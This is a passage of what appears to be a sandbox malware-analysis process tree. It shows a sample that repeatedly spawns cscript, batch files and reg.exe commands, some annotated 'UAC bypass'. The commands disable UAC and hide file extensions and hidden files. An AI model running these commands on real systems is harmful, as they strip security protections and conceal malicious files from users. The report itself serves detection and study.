        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        83⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        80⤵
        
        PID:1392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        80⤵
        
        PID:3840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        80⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sKUYkkIQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        80⤵
        
        PID:2232
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        81⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        78⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        78⤵
        
        PID:3620
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        78⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JCsEooAo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        78⤵
        
        PID:4128
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        79⤵
        
        PID:3028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        76⤵
        
        PID:4348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        76⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        76⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rIAoYEsA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        76⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        77⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        74⤵
        Modifies visibility of file extensions in Explorer
        
        PID:952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        74⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        74⤵
        UAC bypass
        
        PID:760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xsQgwUIY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        74⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        75⤵
        
        PID:3936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        72⤵
        
        PID:688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        72⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        72⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tUokEIMs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        72⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        73⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        70⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        70⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        70⤵
        UAC bypass
        
        PID:1040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YiMQwcYg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        70⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        71⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        68⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        68⤵
        
        PID:4164
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        68⤵
        
        PID:3432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wOcUwAUo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        68⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        69⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        66⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        66⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        66⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\syYMQQAA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        66⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        67⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        64⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        64⤵
        Modifies registry key
        
        PID:4776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        64⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sSskgwUk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        64⤵
        
        PID:616
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        65⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        62⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3356
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        62⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        62⤵
        UAC bypass
        Modifies registry key
        
        PID:420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VecUEccg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        62⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        63⤵
        
        PID:4604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        60⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        60⤵
        
        PID:688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        60⤵
        UAC bypass
        
        PID:1928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HgkowMME.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        60⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        61⤵
        
        PID:848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        58⤵
        Modifies registry key
        
        PID:3764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        58⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        58⤵
        
        PID:1456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FEEYwcQU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        58⤵
        
        PID:3824
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        59⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        56⤵
        
        PID:4880
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        56⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        56⤵
        UAC bypass
        
        PID:2220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sMIIcoIo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        56⤵
        
        PID:4868
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        57⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        54⤵
        Modifies registry key
        
        PID:2592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        54⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        54⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgQskIUQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        54⤵
        
        PID:1204
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        55⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        52⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        52⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        52⤵
        
        PID:3832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MgIAEgkM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        52⤵
        
        PID:3520
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        53⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        50⤵
        Modifies visibility of file extensions in Explorer
        
        PID:748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        50⤵
        
        PID:420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        50⤵
        UAC bypass
        
        PID:4004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\casoosww.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        50⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        51⤵
        
        PID:3232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        48⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        48⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        48⤵
        Modifies registry key
        
        PID:2472
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\piUoIUwE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        48⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        49⤵
        
        PID:3752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        46⤵
        
        PID:3268
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        46⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        46⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nKksEoUA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        46⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        47⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        44⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        44⤵
        Modifies registry key
        
        PID:4728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        44⤵
        UAC bypass
        
        PID:1508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PoAscAco.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        44⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        45⤵
        
        PID:3432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        42⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        42⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        42⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PYUEAIgw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        42⤵
        
        PID:1304
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        43⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        40⤵
        
        PID:3028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        40⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        40⤵
        UAC bypass
        
        PID:4464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ywokAUQE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        40⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        41⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        38⤵
        
        PID:4968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        38⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        38⤵
        Modifies registry key
        
        PID:1076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KcoscQAQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        38⤵
        
        PID:848
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        39⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        36⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        36⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        36⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IUIEAAIk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        36⤵
        
        PID:4316
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        37⤵
        
        PID:3576
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        34⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        34⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        34⤵
        UAC bypass
        
        PID:2316
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nQcwIQQY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        34⤵
        
        PID:2748
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        35⤵
        
        PID:232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        32⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        32⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        32⤵
        
        PID:460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JusQYUso.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        32⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        33⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rGUIUIYM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        30⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        31⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        28⤵
        
        PID:420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        28⤵
        
        PID:556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        28⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NgAMcUck.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        28⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        29⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        26⤵
        Modifies registry key
        
        PID:1184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        26⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        26⤵
        UAC bypass
        
        PID:2716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kkQYMQQY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        26⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        27⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        24⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        24⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        24⤵
        UAC bypass
        
        PID:3632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QMoEQIYw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        24⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\cscript.exe
        
